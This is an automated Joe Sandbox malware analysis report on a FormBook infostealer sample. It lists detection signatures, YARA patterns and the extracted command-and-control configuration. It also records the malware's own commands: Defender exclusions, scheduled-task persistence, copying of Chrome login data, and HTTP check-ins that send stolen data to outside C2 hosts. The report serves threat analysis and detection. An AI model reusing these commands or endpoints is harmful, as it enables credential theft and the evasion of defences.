Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
Analysis ID:1276619
MD5:d72c3bb3172d13ac1cfc172c389e52e5
SHA1:a0bf2dc6ba08e4702098576b8e91f08c91a201ca
SHA256:2b7c90f224a3f2964f56820652ae35673cb830d152dc2203ec1629f69b8f5a00
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Sigma detected: Scheduled temp file as task from temp location
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe (PID: 6908 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe MD5: D72C3BB3172D13AC1CFC172C389E52E5)
    • powershell.exe (PID: 6968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7004 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 3096 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • hkkRsa.exe (PID: 5396 cmdline: C:\Users\user\AppData\Roaming\hkkRsa.exe MD5: D72C3BB3172D13AC1CFC172C389E52E5)
    • schtasks.exe (PID: 3388 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 60 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • hkkRsa.exe (PID: 6664 cmdline: C:\Users\user\AppData\Roaming\hkkRsa.exe MD5: D72C3BB3172D13AC1CFC172C389E52E5)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6192 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6452 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mattewigs.com/co63/"], "decoy": ["detectiveadda.com", "codewm.com", "leeinvesting919.com", "dzaiwn.com", "winecountrywicked.com", "floraldesignsofhastings.com", "saleschildcarriers.com", "kanspersky.com", "mondlyfor.com", "takealicense.com", "aclarkemcgee.com", "riohandmadewithlove.com", "petalumadumpsterrental.com", "stanislavp.com", "mansakesalive.com", "ballthingsez.com", "iongraph.com", "pidesimple.com", "nutritioncalculate.com", "dulichphucbinh.com", "myccsmartmove.com", "infinitenegocios.com", "theatlantainvestoragent.com", "globussgroup.com", "v8ks.com", "salesshoulderpads.com", "freepad168.com", "zgs72.com", "48a47.com", "creativebrea.com", "inf9obase.com", "sehatorthocare.com", "vestostore.com", "girlspooppingtube.com", "tesoroimports.com", "pym479.com", "starlight-edugrp.com", "oleegmedia.com", "rachellebags.com", "f1-austin-tickets.com", "flinterview.com", "naspewt.xyz", "watordropfilter.com", "choppercitypowersports.com", "mazinhoccb.com", "sanantonionailsalon.com", "dlafluid.com", "localhomegurus.com", "shredthepowpow.com", "myboothtemplates.com", "comprec.net", "mespareparts.com", "zenhandsoaps.com", "blynnbundleswigs.com", "joineryxx.com", "cucinainvenice.com", "hzhomeimprovements.com", "kalmiamedia.com", "kuise-east-sakae.com", "mycomopolitantitle.com", "illusionscore.com", "attractyourlifestyle.com", "isicapp.com", "pestcontrolgloves.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c94a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18859:$sqlite3step: 68 34 1C 7B E1
      • 0x1896c:$sqlite3step: 68 34 1C 7B E1
      • 0x18888:$sqlite3text: 68 38 2A 90 C5
      • 0x189ad:$sqlite3text: 68 38 2A 90 C5
      • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 23 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bde0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a59:$sqlite3step: 68 34 1C 7B E1
          • 0x17b6c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a88:$sqlite3text: 68 38 2A 90 C5
          • 0x17bad:$sqlite3text: 68 38 2A 90 C5
          • 0x17a9b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bc3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, ParentProcessId: 6908, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp, ProcessId: 3096, ProcessName: schtasks.exe

          Stealing of Sensitive Information

          barindex
          Sigma detected: Steal Google chrome login data
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6192, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 6452, ProcessName: cmd.exe

          Snort Signatures

          Timestamp:192.168.2.523.227.38.7449731802031412 07/20/23-11:46:57.367343
          SID:2031412
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mattewigs.com/co63/"], "decoy": ["detectiveadda.com", "codewm.com", "leeinvesting919.com", "dzaiwn.com", "winecountrywicked.com", "floraldesignsofhastings.com", "saleschildcarriers.com", "kanspersky.com", "mondlyfor.com", "takealicense.com", "aclarkemcgee.com", "riohandmadewithlove.com", "petalumadumpsterrental.com", "stanislavp.com", "mansakesalive.com", "ballthingsez.com", "iongraph.com", "pidesimple.com", "nutritioncalculate.com", "dulichphucbinh.com", "myccsmartmove.com", "infinitenegocios.com", "theatlantainvestoragent.com", "globussgroup.com", "v8ks.com", "salesshoulderpads.com", "freepad168.com", "zgs72.com", "48a47.com", "creativebrea.com", "inf9obase.com", "sehatorthocare.com", "vestostore.com", "girlspooppingtube.com", "tesoroimports.com", "pym479.com", "starlight-edugrp.com", "oleegmedia.com", "rachellebags.com", "f1-austin-tickets.com", "flinterview.com", "naspewt.xyz", "watordropfilter.com", "choppercitypowersports.com", "mazinhoccb.com", "sanantonionailsalon.com", "dlafluid.com", "localhomegurus.com", "shredthepowpow.com", "myboothtemplates.com", "comprec.net", "mespareparts.com", "zenhandsoaps.com", "blynnbundleswigs.com", "joineryxx.com", "cucinainvenice.com", "hzhomeimprovements.com", "kalmiamedia.com", "kuise-east-sakae.com", "mycomopolitantitle.com", "illusionscore.com", "attractyourlifestyle.com", "isicapp.com", "pestcontrolgloves.com"]}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeReversingLabs: Detection: 23%
          Yara detected FormBook
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.mattewigs.com/co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH-Avira URL Cloud: Label: malware
          Source: http://www.mattewigs.com/co63/Avira URL Cloud: Label: malware
          Source: http://www.mattewigs.com/co63/www.dulichphucbinh.comAvira URL Cloud: Label: malware
          Source: http://www.naspewt.xyz/co63/www.mattewigs.comAvira URL Cloud: Label: phishing
          Source: http://www.naspewt.xyz/co63/Avira URL Cloud: Label: phishing
          Source: www.mattewigs.com/co63/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeReversingLabs: Detection: 23%
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeJoe Sandbox ML: detected
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.427644663.0000000001622000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 0000000A.00000003.424015597.0000000001483000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.487071109.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.486692282.000000000496F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.911668789.0000000004DBF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: hkkRsa.exe, 0000000E.00000002.486732177.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, hkkRsa.exe, 0000000E.00000002.489051209.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000010.00000002.911333276.0000000001330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fOac.pdb source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000000.385827333.0000000000982000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.911442424.0000000004A68000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 0000000F.00000000.477862889.00007FFA13021000.00000020.00000001.01000000.0000000B.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 4x nop then pop ebx10_2_00407B1A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 4x nop then pop esi10_2_00417331

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.naspewt.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.mattewigs.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.215.254 80
          Source: C:\Windows\explorer.exeDomain query: www.vestostore.com
          Source: C:\Windows\explorer.exeDomain query: www.ballthingsez.com
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.26.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.140 80
          Source: C:\Windows\explorer.exeNetwork Connect: 152.199.21.175 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80
          Source: C:\Windows\explorer.exeDomain query: www.saleschildcarriers.com
          Source: C:\Windows\explorer.exeDomain query: www.myccsmartmove.com
          Source: C:\Windows\explorer.exeDomain query: www.takealicense.com
          Source: C:\Windows\explorer.exeNetwork Connect: 86.38.202.187 80
          Source: C:\Windows\explorer.exeDomain query: www.dlafluid.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 23.227.38.74:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.naspewt.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.mattewigs.com/co63/
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.vestostore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=gtjAeIS6VJWpMIOvAorICaUf7+ed7+VEBFwjlL0fBy8QswGl2t9TVUNzPjmUB+tmUyAO&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.saleschildcarriers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=dh5wnP7Ug0+YjaaSPNPjWLPMAAuifa570LEC5RUEdgVY9PwZv9hNJ3RIsZJs9uSwpSOZ&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.ballthingsez.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=7844uNirl1OmKo/iz3P/xC/n+TlWcrf11+et7B27/2a6MTbhGvfvyecJXVPFAq5Jbxq/&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.dlafluid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.myccsmartmove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.takealicense.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH- HTTP/1.1Host: www.mattewigs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 76.223.26.96 76.223.26.96
          Source: Joe Sandbox ViewIP Address: 76.223.26.96 76.223.26.96
          Source: global trafficHTTP traffic detected: POST /co63/ HTTP/1.1Host: www.vestostore.comConnection: closeContent-Length: 1484Cache-Control: no-cacheOrigin: http://www.vestostore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vestostore.com/co63/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 4a 45 6c 77 56 3d 32 38 41 5a 59 73 77 35 63 54 4c 46 6c 6c 7e 72 63 52 6a 69 53 52 72 50 52 52 64 4c 4f 4b 68 33 59 31 47 67 56 6d 7a 76 79 42 34 68 63 52 69 68 6d 56 30 6d 52 74 37 30 47 41 76 6d 76 78 75 31 7a 38 59 68 77 37 42 48 6f 36 4e 4d 71 71 6a 34 71 35 50 61 53 73 72 71 76 5a 71 63 62 68 54 39 34 6b 59 70 6f 4c 28 6c 35 7a 4b 46 33 35 63 6f 52 61 41 44 30 46 35 75 4c 4a 66 71 28 6c 48 53 63 54 56 70 36 74 69 56 6d 43 54 33 67 38 33 54 35 36 58 6b 64 38 62 50 57 70 78 72 66 59 76 5a 6c 61 74 67 4c 66 32 50 41 4f 38 39 63 67 32 51 4a 63 4c 5a 57 57 72 2d 59 6f 28 41 6a 78 4d 70 75 79 65 50 6e 41 5a 4c 63 46 54 49 45 6f 4d 32 28 68 77 37 6b 69 69 6b 49 6d 71 79 53 75 4a 35 79 30 71 46 37 4d 6d 6b 7a 62 4c 55 65 6f 70 46 68 79 6b 7a 28 34 66 7a 6c 4b 51 30 35 55 4e 39 61 69 79 64 5a 4d 68 48 30 4e 68 5a 45 6d 56 34 31 5a 61 70 71 42 5a 6c 47 69 67 4e 78 52 69 6d 30 71 78 7a 42 57 74 57 41 52 73 48 74 38 75 73 6d 30 52 33 68 58 53 57 75 42 6f 5a 70 50 61 72 6b 4c 77 75 55 54 6a 6d 6f 47 59 77 4d 72 75 50 35 4a 33 35 4e 71 68 47 7e 31 32 62 58 6d 46 6f 35 56 52 54 65 37 67 43 59 69 70 66 53 63 33 35 37 54 6c 7a 42 34 35 55 58 2d 4f 4d 7a 6a 33 49 28 63 62 55 61 72 55 77 76 73 66 72 41 62 33 79 73 79 34 72 77 2d 70 61 37 72 6b 5a 71 63 62 42 4e 4d 45 32 6b 71 73 6e 55 66 6f 74 6a 69 64 39 50 43 67 6f 45 30 38 5a 36 79 4b 6e 45 6d 76 4a 62 5f 6c 59 46 68 57 53 4d 6c 48 45 6f 34 79 2d 28 51 6d 59 43 4b 4d 4a 45 32 4c 46 5a 77 65 63 4e 6f 6a 76 33 43 43 70 68 54 38 79 4c 59 56 57 67 70 49 55 54 4b 32 53 33 34 69 37 6f 48 50 6f 42 34 73 4a 46 58 76 4c 51 6f 34 63 41 5a 76 77 6c 63 44 48 64 67 36 62 43 59 51 44 67 37 6d 6f 6e 66 33 54 46 6e 79 56 7a 56 28 79 38 7a 59 79 6a 73 6d 77 6b 7a 32 5a 72 56 34 49 30 39 79 4b 69 53 5a 68 62 74 43 57 61 48 43 36 61 50 5a 77 54 6d 70 51 42 75 37 58 66 74 28 39 55 31 4f 68 73 71 70 5a 67 7a 5a 43 50 4a 33 39 42 36 34 4d 43 6d 69 58 62 